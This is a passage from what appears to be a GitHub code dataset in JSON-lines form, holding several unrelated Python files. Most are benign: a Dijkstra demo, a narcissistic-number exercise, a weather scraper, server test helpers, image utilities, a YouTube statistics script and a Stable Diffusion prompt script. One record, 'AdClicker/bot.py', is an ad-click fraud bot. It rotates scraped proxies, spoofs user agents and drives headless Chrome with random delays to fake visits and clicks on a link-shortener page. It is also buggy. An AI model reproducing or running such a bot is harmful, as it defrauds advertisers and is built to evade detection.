graph[src] :\n if neighbor not in visited:\n new_distance = distances[src] + graph[src][neighbor]\n if new_distance < distances.get(neighbor,float('inf')):\n distances[neighbor] = new_distance\n predecessors[neighbor] = src\n\n visited.append(src)\n\n unvisited={}\n for k in graph:\n if k not in visited:\n unvisited[k] = distances.get(k,float('inf')) \n x=min(unvisited, key=unvisited.get)\n dijkstra(graph,x,dest,visited,distances,predecessors)\n \n\n\nif __name__ == \"__main__\":\n graph = {'s': {'a': 2, 'b': 1},\n 'a': {'s': 3, 'b': 4, 'c':8},\n 'b': {'s': 4, 'a': 2, 'd': 2},\n 'c': {'a': 2, 'd': 7, 't': 4},\n 'd': {'b': 1, 'c': 11, 't': 5},\n 't': {'c': 3, 'd': 5}}\n #dijkstra(graph,'c','b')\n \n \n print(\"-------------------------------\")\n G=nx.Graph()\n G.add_nodes_from(['a','b','c','d','s','t'])\n G.add_weighted_edges_from([('s','b',1),('s','a',2),('a','s',3),('a','b',4),('a','c',8),('b','s',4),('b','a',2),('b','d',2),\n ('c','a',2),('c','d',7),('c','t',4),\n ('d','b',1),('d','c',11),('d','t',5),('t','c',3),('t','d',5)])\n \n l= nx.dijkstra_path(G,'b','t')\n \n\n for p in G.edges():\n G[p[0]][p[1]]['color'] = 'black'\n for i in range(len(l)-1):\n G[l[i]][l[i+1]]['color'] = 'blue'\n # Store in a list to use for drawing\n edge_color_list = [ G[p[0]][p[1]]['color'] for p in G.edges() ]\n nx.draw(G,edge_color = edge_color_list, with_labels = True)\n\n","repo_name":"IHDINA/Theory-Graphes","sub_path":"Djikstra_Path.py","file_name":"Djikstra_Path.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74172041104","text":"#coding=utf-8\n#author:Kingving time:2020/6/17 1:27\n\"\"\"\n1、如果一个 3 位数等于其各位数字的立方和,则称这个数为水仙花数。  \n例如:153 = 1^3 + 5^3 + 3^3,因此 153 就是一个水仙花数\n那么问题来了,求1000以内的水仙花数(3位数)\n\"\"\"\n\n\n# 列出水仙花数\n# for num in range(100, 1000):\n# ge_num = num % 10\n# bai_num = num // 100\n# shi_num = (num - bai_num * 100 - ge_num) // 10\n# if ge_num ** 3 + shi_num ** 3 + bai_num ** 3 == num:\n# print (num)\n#\n#\n# # 判断水仙花数\n# num = int(input('请输入一个三位数'))\n# ge_num = num % 10\n# bai_num = num // 100\n# shi_num = (num - bai_num * 100 - ge_num) // 10\n# if ge_num ** 3 + shi_num ** 3 + bai_num ** 3 == num:\n# print ('%d是水仙花数' % num)\n#\n# else:\n# print ('%d不是水仙花数' % num)\n#\n\n#简单方法\nfor i in range(100,1000):\n s=sum(int(i)**3 for i in str(i))\n if s==i:\n print(i)\n\n\n#拓展方法\nfor i in range(100,10000):\n s=sum([int(j)**len(str(i)) for j in str(i)])\n if s==i:\n print(i)","repo_name":"kakashi-01/python-0504","sub_path":"shanghaiyouyou/题库/水仙花.py","file_name":"水仙花.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72674088787","text":"#pylint:disable=C0103\n#pylint:disable=W0622\n#pylint:disable=W0611\n#pylint:disable=W0404\nimport os\nimport time\nimport random\n\n\n# For MultiProcess\nfrom multiprocessing.dummy import Pool\n\n# Logging and Arg\nfrom sys import exit, argv\nimport logging\nimport requests\nimport urllib.parse\nimport time\nfrom datetime import datetime\n\n\n# py_proxy\n#from proxy import Proxy\n\n# Import selenium modules\nfrom selenium import webdriver\n\n# For Element Selection\nfrom selenium.webdriver.common.by import By\n\n# For Waiting for Elements\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# User Agent\n\n\nfrom fake_useragent import UserAgent\n\n\n# For Proxy Grabber\nfrom bs4 import BeautifulSoup\nimport requests\nimport lxml\n\n\n\n# Data and Variables Here\n\ndriver_path = os.environ.get('CHROMEDRIVER_PATH')\nbinary_path = os.environ.get('GOOGLE_CHROME_BIN')\ndriver_UA = \"\"\"Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6\"\"\"\n\n# Configs Here\nthread_count = os.getenv(\"THREAD_COUNT\", 4)\npage_url = os.getenv(\"PAGE_URL\",\"https://za.gl/\")\n\n# page_urls = os.environ.get(\"PAGE_URLS\")\n# urls_file = os.environ.get(\"URLS_FILE\")\n# if page_urls==None:\n# if not \"http\" in urls_file:\n# if os.path.exists(\"./\" + urls_file):\n# page_urls = open(\"./\" + urls_file, \"r\").read()\n# else:\n# r = requests.get(urls_file)\n# page_urls = r.text()\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef adress_proxy():\n target_url = 'https://www.ip-adress.com/proxy-list'\n result = requests.get(target_url)\n soup = BeautifulSoup(result.text, \"lxml\")\n pars_result = soup.find('tbody').find_all('tr')\n proxy_list = []\n for elem in pars_result:\n elem = elem.get_text().split()[:2]\n if elem[1] != 'transparent':\n proxy_list.append(elem[0])\n return proxy_list\n\ndef check_proxy(proxy):\n proxy = 'http://' + proxy\n time.sleep(1)\n try:\n result = requests.get('http://ip-api.com/json', proxies={'http': proxy}, timeout=2)\n if result.status_code == 200:\n try:\n if result.json()['status'] == 'success':\n return True\n except IndexError:\n return False\n else:\n return False\n except requests.exceptions.ConnectionError:\n return False\n except requests.exceptions.ReadTimeout:\n return False\n except requests.exceptions.ChunkedEncodingError:\n return False\n except requests.exceptions.TooManyRedirects:\n return False\n\n\n\ndef click_adds(page_url, proxy, driver_UA):\n # Create a Proxy Config\n time.sleep(random.choice(range(20,2000)))\n print(\"[#] Using New Proxy: \" + proxy)\n options = webdriver.ChromeOptions()\n options.binary_location = binary_path\n options.add_argument('headless')\n options.add_argument('--proxy-server=' + proxy)\n options.add_argument(\"user-agent=\" + driver_UA)\n options.add_argument('--disable-gpu')\n options.add_argument('--no-sandbox')\n options.add_argument(\"--blink-settings=imagesEnabled=false\")\n #options.add_argument(\"default_content_settings.images=2\")\n options.add_argument('--disable-logging')\n desired_cap = options.to_capabilities()\n # Load Page\n print(\"[#] Loading Page...\")\n pbrowser = webdriver.Chrome(executable_path=driver_path,desired_capabilities=desired_cap,service_log_path=\"chromedriver_logs.log\")\n #pbrowser.maximize_window()\n pbrowser.get(page_url)\n print(\"[#] Success... \"+\"\\n\"+\"[i] Page Title: \"+ pbrowser.title )\n sleep_timer = random.choice(range(2,20))\n print('[#] Waiting {sleep_timer} seconds')\n time.sleep(sleep_timer)\n try:\n print(\"[#] Searching Button...\")\n WebDriverWait(pbrowser, 120).until(EC.element_to_be_clickable((By.CLASS_NAME, \"btn btn-success btn-lg get-link\")))\n print(\"[#] Clicking Button...\")\n WebDriverWait(pbrowser, 20).until(EC.url_changes)\n print(\"[#] Click Ok...\")\n except Exception as e:\n print(\"[!] Error in Clicking Button: \" + str(e))\n pbrowser.quit()\n\n\n\n\n\n\n\n\n\n \n \n\n\n\n\n \n\n\ndef main():\n \"\"\"\n Program\n \"\"\"\n print(\"[#] Starting...\")\n print(\"[#] Fetching Proxies...\")\n proxy_list = adress_proxy()\n working_proxies = []\n for proxy in proxy_list:\n if check_proxy(proxy)==True:\n working_proxies.append(proxy)\n print(\"[#] Found \" + str(len(working_proxies)) + \" working proxies.\")\n # new_proxy = working_proxies[0]\n proxy_counter = 0\n ua = UserAgent()\n with Pool(thread_count) as worker:\n print(\"[#] Starting Click Bot \" + str(proxy_counter) + \" with Proxy: \" + str(working_proxies[proxy_counter]))\n worker.map(click_adds, page_url, working_proxies[proxy_counter], ua.random)\n worker.close()\n proxy_counter += 1\n worker.join()\n # OK\n","repo_name":"default-github-user/AdClicker","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7581602073","text":"import re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\"\"\"URL = \"https://meteoprog.pl/pl/weather/Zabki/\"\n\nhtml_site = requests.get(URL)\nhtml_site = html_site.text\n\nsoup = BeautifulSoup(html_site, \"html.parser\")\n\ntemp = soup('div', class_=\"icon-weather\")\ntemp = temp[0]\nweather_general = temp['title']\n\nprint(f\"General weather forecast: {weather_general}\")\n\ntemp_val = soup('div', class_=\"temp\")\ntemp_0 = temp_val[0]\ntemp_today = temp_0.get_text()\ntemp_final = str(temp_today).strip()\n\nprint(f\"Average temperature today will be: {temp_final}\")\n\ntemp_feel = soup('div', class_=\"someTemp\")\ntemp_feel0 = temp_feel[0].get_text()\ntemp_feel_final = str(temp_feel0).strip()\n\nprint(f\"Temperature you will feel will be: {temp_feel0}\")\"\"\"\n\n\nURL = \"https://pogoda.interia.pl/prognoza-dlugoterminowa-zabki,cId,39837\"\n\nhtml_doc = requests.get(URL)\nhtml_doc2 = html_doc.text\n\nsoup = BeautifulSoup(html_doc2, \"html.parser\")\nweather_all = soup('div', class_=\"weather-forecast-longterm-list-entry\")\n\nweather_today = weather_all[0]\ntoday_day = weather_today('span', class_=\"day\")[0].get_text()\ntoday_date = weather_today('span', class_=\"date\")[0].get_text()\n\nprint(f\"{today_day}, {today_date}\")\n\ndata_today = weather_today.find('div', class_=re.compile(\"top\")) # Wyszukiwanie po fragmencie nazwy klasy.\nmax_temp = data_today.find('span', class_=re.compile(\"temp\")).get_text()\nmin_temp = data_today.find('span', class_=re.compile(\"lowtemp\")).get_text()\nclouds = data_today.find('span', class_=re.compile(\"phrase\")).get_text()\n\nprint(f\"Max day temperature: {max_temp}, Lowest day temperature: {min_temp}, and sky forecast is: {clouds}\")\n\n\n","repo_name":"elenerandarill/PogodaScrapp","sub_path":"PogodaScrapp.py","file_name":"PogodaScrapp.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19647042871","text":"from __future__ import annotations\n\nimport asyncio\nfrom typing import Optional, Union\n\nfrom ..helpers import MockSocket\n\n\nclass MockSSLObject:\n def selected_alpn_protocol(self) -> str:\n return \"h2\"\n\n\nclass MemoryReader:\n def __init__(self) -> None:\n self.data: asyncio.Queue = asyncio.Queue()\n self.eof = False\n\n async def send(self, data: bytes) -> None:\n if data != b\"\":\n await self.data.put(data)\n\n async def read(self, length: int) -> bytes:\n return await self.data.get()\n\n def close(self) -> None:\n self.data.put_nowait(b\"\")\n self.eof = True\n\n def at_eof(self) -> bool:\n return self.eof and self.data.empty()\n\n\nclass MemoryWriter:\n def __init__(self, http2: bool = False) -> None:\n self.is_closed = False\n self.data: asyncio.Queue = asyncio.Queue()\n self.http2 = http2\n\n def get_extra_info(self, name: str) -> Optional[Union[MockSocket, MockSSLObject]]:\n if name == \"socket\":\n return MockSocket()\n elif self.http2 and name == \"ssl_object\":\n return MockSSLObject()\n else:\n return None\n\n def write_eof(self) -> None:\n self.data.put_nowait(b\"\")\n\n def write(self, data: bytes) -> None:\n if self.is_closed:\n raise ConnectionError()\n self.data.put_nowait(data)\n\n async def drain(self) -> None:\n pass\n\n def close(self) -> None:\n self.is_closed = True\n self.data.put_nowait(b\"\")\n\n async def wait_closed(self) -> None:\n pass\n\n async def receive(self) -> bytes:\n return await self.data.get()\n","repo_name":"pgjones/hypercorn","sub_path":"tests/asyncio/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":770,"dataset":"github-code","pt":"48"} +{"seq_id":"5221783366","text":"from typing import List, Tuple\nimport os\n\nimport numpy as np\nimport cv2\n\n\ndef load_file_names(path: str) -> List[str]:\n files = os.listdir(path)\n files = sorted(files, key=lambda x: int(x.split('.')[-2]))\n return files\n\n\ndef load_frames(path: str, files: List[str]) -> List[np.ndarray]:\n frames = []\n for f in files:\n frame = cv2.imread(os.path.join(path, f))\n frames.append(frame)\n return frames\n\n\ndef load_masks(path: str, files: List[str]) -> List[np.ndarray]:\n masks = []\n for f in files:\n mask = cv2.imread(os.path.join(path, f), cv2.IMREAD_GRAYSCALE)\n masks.append(mask)\n return masks\n\n\ndef load_data(frames_path: str, masks_path: str) -> Tuple[List[np.ndarray], List[np.ndarray], List[str]]:\n names = load_file_names(frames_path)\n return load_frames(frames_path, names), load_masks(masks_path, names), names\n\n\ndef save_frames(path: str, files: List[str], frames: List[np.ndarray]) -> None:\n if not os.path.exists(path):\n os.makedirs(path)\n\n for file, frame in zip(files, frames):\n file_path = os.path.join(path, file)\n cv2.imwrite(file_path, frame)\n\n\ndef resize(images: List[np.ndarray], h: int, w: int) -> List[np.ndarray]:\n return np.asarray([cv2.resize(img, (w, h)) for img in images])\n","repo_name":"Nazar96/RFGT","sub_path":"inpainter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31727547791","text":"import os\nfrom dotenv import load_dotenv\nimport pandas as pd\n\nimport google_auth_oauthlib.flow\nimport googleapiclient.discovery\nimport googleapiclient.errors\n\n\ndef get_channel_stats(youtube, channel_ids):\n \n all_data = []\n \n request = youtube.channels().list(\n part=\"snippet,contentDetails,statistics\",\n id=channel_ids\n )\n \n response = request.execute()\n \n for item in response[\"items\"]:\n data = {'channelName': item[\"snippet\"][\"title\"],\n 'publishedDate': item[\"snippet\"][\"publishedAt\"],\n 'subscribers': item[\"statistics\"][\"subscriberCount\"],\n 'views': item[\"statistics\"][\"viewCount\"],\n 'totalVideos': item[\"statistics\"][\"videoCount\"],\n 'playlistId': item[\"contentDetails\"]['relatedPlaylists']['uploads']\n }\n \n all_data.append(data)\n \n return(pd.DataFrame(all_data))\n\ndef get_video_ids(youtube, playlist_id):\n \n video_ids = []\n \n request = youtube.playlistItems().list(\n part=\"snippet,contentDetails\",\n playlistId=playlist_id,\n maxResults = 50\n )\n \n response = request.execute()\n \n for item in response['items']:\n video_ids.append(item[\"contentDetails\"]['videoId'])\n \n next_page_token = response.get('nextPageToken')\n while next_page_token is not None:\n request = youtube.playlistItems().list(\n part=\"contentDetails\",\n playlistId=playlist_id,\n maxResults = 50,\n pageToken = next_page_token\n )\n response = request.execute()\n\n for item in response['items']:\n video_ids.append(item[\"contentDetails\"]['videoId'])\n \n next_page_token = response.get('nextPageToken')\n \n return video_ids\n \ndef get_video_details(youtube, video_ids):\n \n all_video_info = []\n \n for ids in video_ids:\n request = youtube.videos().list(\n part=\"snippet,contentDetails,statistics\",\n id=ids\n )\n response = request.execute()\n \n for video in response[\"items\"]:\n stats_to_keep = {'snippet': ['title', 'description', 'publishedAt', 'tags'],\n 'statistics': ['viewCount', 'likeCount', 'favoriteCount', 'commentCount'],\n 'contentDetails': ['duration', 'definition', 'caption']}\n \n video_info = {}\n video_info[\"video_id\"] = video[\"id\"]\n \n for k in stats_to_keep.keys():\n for v in stats_to_keep[k]:\n try:\n video_info[v] = video[k][v]\n except:\n video_info[v] = None\n \n all_video_info.append(video_info)\n \n return pd.DataFrame(all_video_info)\n\ndef main():\n # Load Environments\n api_service_name = \"youtube\"\n api_version = \"v3\"\n load_dotenv()\n \n # Set Configurations\n API_KEY = os.getenv(\"API_KEY\")\n channel_ids = 'UCuJyaxv7V-HK4_qQzNK_BXQ'\n youtube = googleapiclient.discovery.build(\n api_service_name, api_version, developerKey=API_KEY)\n\n # Get Channel Statistics\n channel_stats = get_channel_stats(youtube, channel_ids)\n playlist_id = channel_stats.playlistId.values[0]\n \n # Get Video Information\n video_ids = get_video_ids(youtube, playlist_id)\n all_video_info = get_video_details(youtube, video_ids)\n \n all_video_info.to_csv(\"data.csv\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Joanna-Khek/youtube_api","sub_path":"youtube-api.py","file_name":"youtube-api.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38266555890","text":"import copy\nimport math\nimport os\nimport random\nimport sys\nimport traceback\nimport shlex\nimport re\n\nimport modules.scripts as scripts\nimport gradio as gr\n\nfrom modules import sd_samplers\nfrom modules.processing import Processed, process_images\nfrom PIL import Image\nfrom modules.shared import opts, cmd_opts, state\n\n\ndef process_string_tag(tag):\n return tag\n\n\ndef process_int_tag(tag):\n return int(tag)\n\n\ndef process_float_tag(tag):\n return float(tag)\n\n\ndef process_boolean_tag(tag):\n return True if (tag == \"true\") else False\n\n\nprompt_tags = {\n \"sd_model\": None, # 翻译过来是 生成对抗模型\n \"outpath_samples\": process_string_tag, # 翻译过来是 输出样本路径\n \"outpath_grids\": process_string_tag, # 翻译过来是 输出网格路径\n \"prompt_for_display\": process_string_tag, # 翻译过来是 显示提示\n \"prompt\": process_string_tag, # 翻译过来是 提示\n \"negative_prompt\": process_string_tag, # 翻译过来是 负提示\n \"styles\": process_string_tag, # 翻译过来是 样式\n \"seed\": process_int_tag, # 翻译过来是 种子\n \"subseed_strength\": process_float_tag, # 翻译过来是 子种子强度\n \"subseed\": process_int_tag, # 翻译过来是 子种子\n \"seed_resize_from_h\": process_int_tag, # 翻译过来是 从高度调整种子大小\n \"seed_resize_from_w\": process_int_tag, # 翻译过来是 从宽度调整种子大小\n \"sampler_index\": process_int_tag, # 翻译过来是 采样器索引\n \"sampler_name\": process_string_tag, # 翻译过来是 采样器名称\n \"batch_size\": process_int_tag, # 翻译过来是 批量大小\n \"n_iter\": process_int_tag, # 翻译过来是 迭代次数\n \"steps\": process_int_tag, # 翻译过来是 步数\n \"cfg_scale\": process_float_tag, # 翻译过来是 配置比例\n \"width\": process_int_tag, # 翻译过来是 宽度\n \"height\": process_int_tag, # 翻译过来是 高度\n \"restore_faces\": process_boolean_tag, # 翻译过来是 恢复面部\n \"tiling\": process_boolean_tag, # 翻译过来是 平铺\n \"do_not_save_samples\": process_boolean_tag, # 翻译过来是 不保存样本\n \"do_not_save_grid\": process_boolean_tag # 翻译过来是 不保存网格\n}\n\nooo = \"Black clothes, (black hair),\"\n\n\ndef cmdargs(line): # 函数功能是 命令行参数\n args = shlex.split(line)\n pos = 0\n res = {}\n\n while pos < len(args):\n arg = args[pos]\n\n assert arg.startswith(\"--\"), f'must start with \"--\": {arg}' # 翻译过来是 必须以“--”开头\n assert pos + 1 < len(args), f'missing argument for command line option {arg}' # 翻译过来是 命令行选项缺少参数\n\n tag = arg[2:]\n\n if tag == \"prompt\" or tag == \"negative_prompt\": # 翻译过来是 提示或负提示\n pos += 1\n prompt = args[pos]\n pos += 1\n while pos < len(args) and not args[pos].startswith(\"--\"): # 翻译过来是 以“--”开头\n prompt += \" \"\n prompt += args[pos]\n pos += 1\n res[tag] = prompt\n continue\n\n func = prompt_tags.get(tag, None) # 翻译过来是 提示标签\n assert func, f'unknown commandline option: {arg}' # 翻译过来是 未知的命令行选项\n\n val = args[pos + 1] # 翻译过来是 值\n if tag == \"sampler_name\": # 翻译过来是 采样器名称\n val = sd_samplers.samplers_map.get(val.lower(), None) # 翻译过来是 采样器映射\n\n res[tag] = func(val) # 翻译过来是 函数\n\n pos += 2 # 翻译过来是 位置\n\n return res # 上面这个函数的功能是 通过命令行参数来设置参数\n\n\nmtt1 = \"(((Black and white comic page content))),(Black hair),\"\nmtt2 = \" ((Colorful manga,Dialogue bubble box, Animated movies)),\"\nmtt3 = \"Magnificent and breathtaking wallpapers that steal the show, \"\n\n\ndef load_prompt_file(file):\n if file is None:\n lines = []\n else:\n lines = [x.strip() for x in file.decode('utf8', errors='ignore').split(\"\\n\")]\n\n return None, \"\\n\".join(lines), gr.update(lines=7)\n\n\ndef ddd(num):\n if num == 0:\n return \"\"\n else:\n return '(' * num + 'Sense of speed' + ')' * num\n\n\ndef ttxq(num):\n if num == 0:\n return \"\"\n else:\n return '(' * num + 'Full-frame fisheye visualization,' + ')' * num\n\n\nmqfd = \"Close-up, extreme close-up, medium close-up, medium shot, medium long shot, long shot, extreme long shot, full shot, cowboy shot, bird's eye view, worm's eye view, high angle, low angle, Dutch angle, straight-on angle, over-the-shoulder shot, point-of-view shot, two-shot, three-shot, establishing shot, cutaway shot, reaction shot, insert shot, off-screen shot, reverse angle, top shot, bottom shot, tilt shot, pan shot, zoom in shot, zoom out shot, dolly in shot, dolly out shot, tracking shot, steadicam shot, handheld shot, crane shot, aerial shot, split screen shot, freeze frame shot.\"\n\n\ndef qqq(num):\n if num == 0:\n return \"\"\n elif num < 0:\n return '(' * abs(num) + '(Cute art style),' + ')' * abs(num)\n else:\n return '(' * num + 'Realistic style,' + ')' * num\n\n\ndef tttrt(fff):\n if fff == 0:\n return \"\"\n elif fff < 0:\n return '(' * abs(fff) + '(Horror, gloomy visuals),' + ')' * abs(fff)\n else:\n return '(' * fff + 'Sunshine, optimistic visuals,' + ')' * fff\n\n\ndef get_name(name_str):\n name_list = name_str.split('-')\n return '({})'.format(name_list[0].strip())\n\n\ndef txttf(text):\n pattern = r'[。!?\\?\\n;;,\\.\\s]'\n lines = re.split(pattern, text)\n lines = [line.strip() for line in lines if line.strip()]\n return '\\n'.join(lines)\n\n\ndef kkkk(sentence, word_str):\n word_dict = {}\n try:\n for pair in word_str.split(\",\"):\n if not pair:\n continue\n old_word, new_word = pair.split(\"-\")\n word_dict[old_word.strip()] = new_word.strip()\n except ValueError:\n return sentence\n for old_word, new_word in word_dict.items():\n if old_word.isupper():\n sentence = sentence.replace(old_word, new_word.upper())\n else:\n sentence = sentence.replace(old_word, new_word)\n result = sentence.title()\n result = re.sub('(<.*?>)', lambda m: m.group().lower(), result)\n return result\n\n\nqqta = \"把剧本填写在这里~~(1 girl),(1 boy),(2 people),\"\n\nppt = \",Movie shots, \"\ndddf = \",stone, \"\nmtt = \",kkk, \"\ncccctt = \"Left, right, up, down, forward, backward, north, south, east, west, northeast, northwest, southeast, southwest, horizontal, vertical, diagonal, ascending, descending, clockwise\"\nggg = \"\"\ndddtt = \"Horizon, Cascade, Serenity, Luminous, Whirlpool, Twilight, Radiance, Oasis, Spectrum, Reflection, Infinity, Aurora, Harmony, Velocity, Enigma, Eclipse, Galaxy, Mirage, Thunderstorm, Cosmos,Synthesis, Blossom, Chaos, Solitude, Vibrance, Illusion, Euphoria, Nebula, Phoenix, Melancholy\"\nmcc = \"\"\nddc = \"\"\nqdf = \"\"\n\n\nclass Script(scripts.Script):\n def title(self):\n return \"AI漫画助手v3.0 作者咸蛋酱\"\n\n def ui(self, is_img2img):\n\n with gr.Row():\n xtf = gr.Dropdown(label=\"选择作者画风(预设)-- [如果无效说明模型不包含这类数据]\",\n choices=[\" - 无\", \"Loish - 创新者\", \"Kim Jung Gi - 无限想象\", \"Artgerm - 超级女孩\", \"Sakimichan - 魔法奇谭\",\n \"James Paick - 未来科技\", \"Jock - 末日幸存者\", \"Bang Sangho - 斗鱼\", \"Stanley Lau - 正义联盟\",\n \"Yuehui Tang - 神话世界\", \"Krenz Cushart - 战斗机甲\", \"WLOP - 粉色噩梦\", \"Guweiz - 幸存者\",\n \"Fishball - 三体:死神永生\", \"Loish - 梦境之旅\", \"Artgerm - 帝国的崛起\", \"Hoon - 地球之子\",\n \"Kuvshinov Ilya - 暗影猎人\", \"Redjuice - 遥远的未来\", \"Koyorin - 星际公主\", \"Sakimichan - 龙珠:超级赛亚人\",\n \"James Paick - 星际之战\", \"Sparth (Nicolas Bouvier) - 未来城市\", \"Craig Mullins - 地球未来\",\n \"Ryan Meinerding - 漫威电影\", \"John Wallin Liberto - 外星空间\", \"Fenghua Zhong - 远古王朝\",\n \"Mike Nash - 魔法学院\", \"Sergey Kolesov - 超现实幻想\", \"Eytan Zana - 极光奇观\", \"Simon Weaner - 反乌托邦世界\",\n \"Stanley Lau - 神奇女侠: 马蒂斯之死\", \"Brom - 黑暗精灵\", \"Jock - 蝙蝠侠: 黑暗骑士归来\", \"Oliver Coipel - 金刚\",\n \"Beksinski - 外星人\", \"Yoshitaka Amano - 尤迪安\", \"Kekai Kotaki - 龙族起源\", \"Sachin Teng - 雪之女王\",\n \"Jasmine Becket-Griffith - 魔法国度\", \"Pascal Blanche - 星际探险家\", \"Joakim Ericsson - 阿拉德历险记\",\n \"Jesper Ejsing - 龙与地下城\", \"Ian McQue - 星际迷航\", \"Ryan Meinerding - 钢铁侠:英雄崛起\",\n \"Kekai Kotaki - 光与暗的传说\", \"Ruan Jia - 火影忍者\", \"Bastien Lecouffe Deharme - 神话传说\",\n \"Ryan Lang - 奇幻森林\", \"Daniel Kamarudin - 《魔兽世界》\", \"Eytan Zana - 未来战士\",\n \"Stan Lee - 蜘蛛侠、钢铁侠、雷神等漫威英雄\", \"Todd McFarlane - 脊柱之战、自杀小队\", \"Neil Gaiman - 沙曼、无人洛城\",\n \"Dave Gibbons - 世纪杀手\", \"Frank Miller - 蝙蝠侠:黑暗骑士归来、罪恶之城\",\n \"Bill Watterson - 柯南·伊素格、公园和斯皮格\", \"Osamu Tezuka - 铁臂阿童木、星球大战、菠萝超人\",\n \"Hayao Miyazaki - 龙猫、天空之城、千与千寻\", \"Robert Crumb - 乌托邦\", \"Al Hirschfeld - 百老汇剧院的演员插画\",\n \"Daniel Danger - 最后生还者 (插画师)\", \"Dave Rapoza - 忍者神龟 (插画师)\",\n \"Jessica Hische - 企鹅出版社 (插画师)\", \"Jock - 蝙蝠侠 (插画师)\", \"Ken Taylor - 盗梦空间 (插画师)\",\n \"Lauren Hom - 谷歌 (插画师)\", \"Loish - Wacom (插画师)\", \"Mike Mitchell - 漫威 (插画师)\",\n \"Shantell Martin - 纽约城市芭蕾舞团 (插画师)\", \"Stephen Bliss - 侠盗猎车手 (插画师)\", \"Steve Prescott - 战锤\",\n \"Yoshitaka Amano - 最终幻想\", \"Akira Toriyama - 龙珠\", \"Hayao Miyazaki - 千与千寻\",\n \"Osamu Tezuka - 铁臂阿童木\", \"Masamune Shirow - 攻壳机动队\", \"Takehiko Inoue - 灌篮高手\",\n \"Katsuhiro Otomo - AKIRA\", \"Tsutomu Nihei - BLAME!\", \"Kazuo Umezu - 漂流教室\",\n \"Hirohiko Araki - JoJo的奇妙冒险\", \"Rei Hiroe - 黑色底盘\", \"Yusuke Murata - 一拳超人\",\n \"Kentaro Miura - 烙印勇士\", \"Fumiya Sato - 杀戮都市\", \"Naoki Urasawa - MONSTER\", \"Tite Kubo - 死神\",\n \"Hiromu Arakawa - 钢之炼金术师\", \"Takeshi Obata - 死亡笔记\", \"CLAMP collective - 魔卡少女樱\",\n \"Rumiko Takahashi - 犬夜叉\", \"Ralph McQuarrie - 星球大战\", \"Syd Mead - 洛城机密\", \"Rick Baker - 狼人、星际迷航\",\n \"H.R. Giger - 异形\", \"Jean Giraud (Moebius) - 第五元素\", \"Yoshitaka Amano - 最终幻想\",\n \"Geof Darrow - 黑客帝国\", \"Nilo Rodis-Jamero - 星球大战\", \"Doug Chiang - 星球大战、阿凡达\", \"John Howe - 魔戒\",\n \"Alan Lee - 魔戒、霍比特人\", \"Stuart Craig - 哈利波特\", \"Kevin O'Neill - 世纪之战\", \"Alex McDowell - 迷雾之城\",\n \"Ken Adam - 詹姆斯•邦德系列电影\", \"CLAMP - 经久纱流、大场水滸传、某个科学的超电磁炮\",\n \"Koyoharu Gotouge - 鬼灭之刃\", \"Hajime Isayama - 进击的巨人\", \"Mitsuru Adachi - 双截龙\",\n \"Inio Asano - 国王游戏、好想告诉你\", \"Yusei Matsui - 暗杀教室\", \"Junji Ito - Uzumaki、镰仓物语、恶魔之谷\",\n \"Hiro Mashima - FAIRY TAIL、EDENS ZERO\", \"Kohei Horikoshi - 像素英雄\",\n \"Aka Akasaka - 与谍同谋、被讨厌的松本同学\", \"Kentarō Miura - 灌篮高手、小说家、新暗行御史\",\n \"Kengo Hanazawa - 吃人鬼、我与僵尸有个约会\", \"Yuki Tabata - 黑色五叶草\", \"Gege Akutami - 呪術廻戦\",\n \"Kousuke Oono - 一弹起始、蓝天航线\", \"Akiko Higashimura - 刺客伍六三、东京女子图鉴、虚构推理\",\n \"Io Sakisaka - 好想告诉你、罗曼蒂克的玩具、Honey and Clover\", \"Haruko Ichikawa - 一人之下、千古王者、山海情\",\n \"Haruka Kanda - 紫罗兰永恒花园、花开伊吕波、猎魔人\", \"Miyuki Nakayama - 战斗陀螺、洛克人X\",\n \"Paru Itagaki - 社长,戏说社员的恋爱\", \" Kouhei Aonishi - 大声展开!伸展吧!我的腰椎、钓鱼之夏、深夜食堂\",\n \"Fujimoto Tatsuki - 鬼滅之刃 炭治郎外传 悲伤之刃、CHAINSAWMAN\",\n \"Yuito Kimura - 重新起航的天之歌、谷底的那一抹阳光、白色相簿2\",\n \"Yuji Kaku - 圣断罗斯之魔女、绝命诗1816、麻衣的宇宙奇幻之旅\", \"Yoshitaka Amano - 宝石之国(插画师)\",\n \"Range Murata - 最终幻想XII、法师与猫(插画师)\", \"Kazuki Takahashi - 游戏王(插画师)\",\n \"Akihiko Yoshida - 光之海(插画师)\", \"Shunya Yamashita - 信长之野望Online、绝对领域战争(插画师)\",\n \"Tony Taka - 无双OROCHI系列、Fault!(插画师)\", \"Nishikiito - 食戟之灵(插画师)\",\n \"REDJUICE - Guilty Crown、Beatless(插画师)\", \"WIT STUDIO - 进击的巨人、在下坂本,有何贵干?(动画公司)\",\n \"Hiroshi Nagai - F-1 Grand Prix、F-1 Hero(插画师)\", \"HACCAN - 武器种族传说、墓之沙(插画师)\",\n \"Kisai Takayama - 魔卡少女樱、魔法骑士雷阿斯(插画师)\", \"CLAMP - 神之塔(插画师)\",\n \"Yuka Nakajima - Fate/Grand Order、乐园追放(插画师)\", \"Akiman - 